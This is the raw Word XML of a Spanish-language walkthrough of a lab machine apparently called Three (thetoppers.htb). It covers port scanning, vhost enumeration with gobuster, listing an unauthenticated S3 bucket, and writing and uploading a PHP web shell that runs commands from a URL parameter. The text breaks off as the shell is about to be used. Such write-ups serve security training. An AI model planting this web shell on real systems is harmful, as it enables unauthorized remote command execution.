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EAA60B" w14:textId="22C4AF17" w:rsidR="006D5440" w:rsidRPr="0074381C" w:rsidRDefault="00346288" w:rsidP="0074381C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALISIS </w:t>
      </w:r>
      <w:r w:rsidR="00101922" w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">MAQUINA VIRTUAL </w:t>
      </w:r>
      <w:r w:rsidR="00553434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>THREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667932D9" w14:textId="77777777" w:rsidR="0074381C" w:rsidRDefault="0074381C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B3EDCB" w14:textId="40F1E68F" w:rsidR="008277E8" w:rsidRPr="00121D7D" w:rsidRDefault="008277E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Dificultad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B148B6" w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Fácil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AB487" w14:textId="735B2736" w:rsidR="008277E8" w:rsidRPr="00121D7D" w:rsidRDefault="008277E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Etiqueta:</w:t>
      </w:r>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00553434">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BED91" w14:textId="3DB3AB25" w:rsidR="00101922" w:rsidRPr="0074381C" w:rsidRDefault="00101922">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>IP Maquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B99092" w14:textId="1CEAD494" w:rsidR="00101922" w:rsidRDefault="009B0533">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F09BE5" wp14:editId="2DC6B2DC">
            <wp:extent cx="5612130" cy="16046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66A59" w14:textId="026E099C" w:rsidR="00101922" w:rsidRPr="00121D7D" w:rsidRDefault="00101922">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Realizamos ping para ver si tenemos conexión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB10E76" w14:textId="6B81D0DF" w:rsidR="00101922" w:rsidRPr="00565330" w:rsidRDefault="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E36FE0F" wp14:editId="521D39B7">
            <wp:extent cx="5612130" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="762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EC77E" w14:textId="63DC5E7B" w:rsidR="00FB5570" w:rsidRPr="00121D7D" w:rsidRDefault="00FB5570" w:rsidP="00FB5570">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Escaneamos para ver los puertos y servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F858CDE" w14:textId="65CAE4A1" w:rsidR="001C5E45" w:rsidRDefault="00817D70" w:rsidP="00565330">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A23431">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47E76FD9" wp14:editId="64CB4960">
            <wp:extent cx="5612130" cy="176847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1DEE3" w14:textId="58F7669C" w:rsidR="00A23431" w:rsidRDefault="00A23431" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Tenemos el puerto 22 del servicio ssh versión OpenSSH 7.6p1 y también tenemos el puerto 80 del servicio http versión Apache httpd 2.4.29.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628594C" w14:textId="2983AA9E" w:rsidR="00A23431" w:rsidRDefault="00A23431" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Al tener el puerto 80 iniciaremos colando en el navegador la dirección ip de la maquina ya que seguro obtendremos una pagina web corriendo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B353F0C" w14:textId="28CD398D" w:rsidR="00A23431" w:rsidRDefault="009B0533" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A33E38" wp14:editId="2CECCE2E">
            <wp:extent cx="5612130" cy="2565400"/>
            <wp:effectExtent l="0" t="0" r="762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AE1D" w14:textId="3D2C4678" w:rsidR="0074434A" w:rsidRDefault="0074434A" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074434A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Con la herramienta dirbuster e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>scaneamos directorios y encontramos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66983259" w14:textId="64F36E3C" w:rsidR="0074434A" w:rsidRPr="0074434A" w:rsidRDefault="0074434A" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D8CDA2" wp14:editId="3D55B7E3">
            <wp:extent cx="4571429" cy="3295238"/>
            <wp:effectExtent l="0" t="0" r="63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3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0D847" w14:textId="5BF56124" w:rsidR="0074434A" w:rsidRPr="0074434A" w:rsidRDefault="00A74A4D" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>No lo escaneamos todo ya que el objetivo importante lo encontramos y era verificar el lenguaje de programacion que en nuestro caso es PHP lo pudismos tambien averiguado con wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A999C2A" w14:textId="2208E840" w:rsidR="0074434A" w:rsidRPr="0074434A" w:rsidRDefault="0074434A" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC2B5CB" w14:textId="2AC4FEB8" w:rsidR="0074434A" w:rsidRPr="0074434A" w:rsidRDefault="0074434A" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626CA7BE" w14:textId="77777777" w:rsidR="0074434A" w:rsidRPr="0074434A" w:rsidRDefault="0074434A" w:rsidP="00A23431">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAEE8BA" w14:textId="74AFCDE4" w:rsidR="009B0533" w:rsidRDefault="009B0533" w:rsidP="009B0533">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Revisando la pagina en la sección de contactos encontramos el correo </w:t>
      </w:r>
      <w:r w:rsidRPr="009B0533">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00DA7A01">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-419"/>
          </w:rPr>
          <w:t>mail@thetoppers.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="043E58A2" w14:textId="56652CFB" w:rsidR="009B0533" w:rsidRDefault="009B0533" w:rsidP="009B0533">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7310A807" wp14:editId="1EC7145E">
            <wp:extent cx="5612130" cy="2112010"/>
            <wp:effectExtent l="0" t="0" r="762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B7EAE" w14:textId="0C935C4B" w:rsidR="009B0533" w:rsidRDefault="009B0533" w:rsidP="009B0533">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00667F6B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">l cual podemos agregar al archiv /etc/hosts el nombre del dominio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4850A9" w14:textId="33827EDB" w:rsidR="00667F6B" w:rsidRDefault="00667F6B" w:rsidP="009B0533">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE7B378" wp14:editId="43C94D16">
            <wp:extent cx="5612130" cy="1329055"/>
            <wp:effectExtent l="0" t="0" r="762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96662" w14:textId="2728BFD3" w:rsidR="00667F6B" w:rsidRDefault="00667F6B" w:rsidP="00667F6B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105FA9ED" wp14:editId="5FFF0067">
            <wp:extent cx="4377447" cy="2002491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84244" cy="2005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CAA1" w14:textId="66917F8B" w:rsidR="003813B8" w:rsidRDefault="003813B8" w:rsidP="003813B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D6D767" w14:textId="26AEACA4" w:rsidR="003813B8" w:rsidRDefault="003813B8" w:rsidP="003813B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003813B8">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Como tenemos el dominio thetoppers.htb , enumeremos cualquier otro subdominio que pueda estar presente en el mismo servidor. Hay diferentes herramientas de enumeración disponibles para este propósito, como gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> usamos el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1621E6B9" w14:textId="7F3514E1" w:rsidR="003813B8" w:rsidRDefault="003813B8" w:rsidP="003813B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003813B8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EF460" w14:textId="1E7EB481" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473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DC906AA" wp14:editId="2A8CF810">
            <wp:extent cx="5223753" cy="19711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5865" cy="1971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F69B7" w14:textId="34B2299F" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2473">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Como resultado interesante temenos s3.thetoppers.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> el cual agregaremos al archivo /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F384BD" w14:textId="487B81D8" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>El resutado</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2473">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica que S3 es un servicio de almacenamiento de objetos basado en la nube. Nos permite almacenar cosas en recipientes llamados cubos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453119BB" w14:textId="7D154EA8" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DBC88AC" wp14:editId="4F76FEF9">
            <wp:extent cx="5612130" cy="124333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82DC" w14:textId="723D7C38" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Colocamos el resultado en el navegador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD370C5" w14:textId="453B9CA2" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E27773" wp14:editId="530D6DD6">
            <wp:extent cx="5333333" cy="1428571"/>
            <wp:effectExtent l="0" t="0" r="127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3333" cy="1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4D04A" w14:textId="731BFBD1" w:rsidR="000B2473" w:rsidRDefault="000B2473" w:rsidP="000B2473">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2473">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Los depósitos de AWS S3 tienen varios casos de uso que incluyen copia de seguridad y almacenamiento, alojamiento de medios, entrega de software, sitio web estático, etc. Los archivos almacenados en el depósito de Amazon S3 se denominan objetos de S3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13987EA9" w14:textId="5C3FC514" w:rsidR="000F05DF" w:rsidRDefault="000F05DF" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15786623" w14:textId="2DC3FC18" w:rsidR="000F05DF" w:rsidRDefault="000F05DF" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F05DF">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Podemos interactuar con este depósito S3 con la ayuda de la utilidad awscli . Se puede instalar en Linux usando el comando apt install awscli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAF8F0" w14:textId="470DF10C" w:rsidR="000F05DF" w:rsidRDefault="000F05DF" w:rsidP="000F05DF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CE53465" wp14:editId="5D86F7A8">
            <wp:extent cx="5612130" cy="16656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E30FD" w14:textId="77777777" w:rsidR="000F05DF" w:rsidRDefault="000F05DF" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F05DF">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Primero, necesitamos configurarlo usando el siguiente comando. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EE999" w14:textId="6525961E" w:rsidR="000F05DF" w:rsidRDefault="000F05DF" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F05DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>aws configure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCFA1A" w14:textId="6D6BE151" w:rsidR="0012096E" w:rsidRPr="0012096E" w:rsidRDefault="0012096E" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012096E">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Usaremos un valor arbitrario para todos los campos, ya que a veces el servidor está configurado para no verificar la autenticación (aún así, debe estar configurado para que AWS funcione).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636AB90" w14:textId="08E91796" w:rsidR="0012096E" w:rsidRPr="000F05DF" w:rsidRDefault="0012096E" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713A8F8F" wp14:editId="0D12D86A">
            <wp:extent cx="2762656" cy="920886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336" cy="923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67885" w14:textId="77777777" w:rsidR="0012096E" w:rsidRDefault="000F05DF" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F05DF">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos enumerar todos los cubos de S3 alojados por el servidor mediante el comando ls . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7149D" w14:textId="6B0784B2" w:rsidR="0012096E" w:rsidRDefault="0012096E" w:rsidP="000F05DF">
      <w:r>
        <w:t>aws --endpoint=http://s3.thetoppers.htb s3 ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242145D" w14:textId="6DD585CA" w:rsidR="0012096E" w:rsidRPr="0012096E" w:rsidRDefault="0012096E" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76F53CAA" wp14:editId="392544E9">
            <wp:extent cx="4190476" cy="609524"/>
            <wp:effectExtent l="0" t="0" r="635" b="63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FA635" w14:textId="094CA844" w:rsidR="000F05DF" w:rsidRDefault="0012096E" w:rsidP="000F05DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012096E">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>También podemos usar el comando ls para enumerar objetos y prefijos comunes en el depósito especificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDFEE6D" w14:textId="4F08EB3C" w:rsidR="0012096E" w:rsidRDefault="0012096E" w:rsidP="0012096E">
      <w:r>
        <w:t>aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435372A" w14:textId="272816EA" w:rsidR="0012096E" w:rsidRDefault="0012096E" w:rsidP="0012096E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4182DBCF" wp14:editId="2E0A6506">
            <wp:extent cx="5612130" cy="95758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3D5E4" w14:textId="11E5029E" w:rsidR="00A74A4D" w:rsidRDefault="00A74A4D" w:rsidP="00A74A4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Vemos que tenemos 3 resultados directorio images, archivo htacces y index.php, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74A4D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>awscli tiene otra característica que nos permite copiar archivos a un depósito remoto. Ya sabemos que el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74A4D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>sitio web está utilizando PHP. Por lo tanto, podemos intentar cargar un archivo de shell de PHP en el depósito S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A21E2C" w14:textId="7B6C4F5A" w:rsidR="00A74A4D" w:rsidRDefault="00A74A4D" w:rsidP="00A74A4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052D39F1" w14:textId="2F07CD11" w:rsidR="00A74A4D" w:rsidRDefault="00A74A4D" w:rsidP="00A74A4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74A4D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vamos a crear un archivo PHP para cargar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> con nombre Shell.php con el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701298BB" w14:textId="34752AD4" w:rsidR="00A74A4D" w:rsidRDefault="00A74A4D" w:rsidP="00A74A4D">
      <w:r w:rsidRPr="00A74A4D">
        <w:t>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8CDD4" w14:textId="0A8419B9" w:rsidR="00CF295B" w:rsidRDefault="00400283" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DB89B4" wp14:editId="693E7A68">
            <wp:extent cx="4676190" cy="56190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6190" cy="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9A44A" w14:textId="425885E9" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CDD979E" wp14:editId="7AE87189">
            <wp:extent cx="5612130" cy="3130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62046" w14:textId="476C2A4C" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Luego, podemos cargar este shell de PHP en el depósito thetoppers.htb S3 usando el siguiente comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F76AF" w14:textId="7A68ED66" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:r>
        <w:t>aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26686435" w14:textId="6346BF55" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD6E274" wp14:editId="76DFC0C3">
            <wp:extent cx="5612130" cy="51943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70B8D" w14:textId="3891A4AF" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Podemos confirmar que nuestro shell está cargado navegando a http://thetoppers.htb/shell.php. Intentemos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">ejecutando la identificación del comando del sistema operativo usando el parámetro de URL cmd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667950E" w14:textId="6A073219" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
